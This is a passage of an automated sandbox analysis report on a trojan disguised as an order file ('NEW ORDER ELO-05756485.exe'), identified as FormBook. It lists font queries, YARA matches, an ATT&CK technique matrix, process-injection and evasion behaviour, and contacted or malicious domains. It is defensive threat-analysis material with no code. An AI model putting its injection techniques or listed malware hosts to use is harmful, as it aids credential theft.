          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 383983 Sample: NEW ORDER ELO-05756485.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 10 other signatures 2->42 10 NEW ORDER ELO-05756485.exe 3 2->10         started        process3 file4 28 C:\Users\...28EW ORDER ELO-05756485.exe.log, ASCII 10->28 dropped 52 Injects a PE file into a foreign processes 10->52 14 NEW ORDER ELO-05756485.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.dehaochu.com 23.82.149.10, 49752, 80 LEASEWEB-USA-SEA-10US United States 17->30 32 www.goproteinz.com 17->32 34 3 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 colorcpl.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NEW ORDER ELO-05756485.exe37%VirustotalBrowse
          NEW ORDER ELO-05756485.exe27%ReversingLabsWin32.Trojan.AgentTesla
          NEW ORDER ELO-05756485.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.dehaochu.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.jumlasx.xyz/riai/100%Avira URL Cloudmalware
          http://www.upperish.com/riai/www.elevictory.com0%Avira URL Cloudsafe
          http://www.pinupcasino-start.site0%Avira URL Cloudsafe
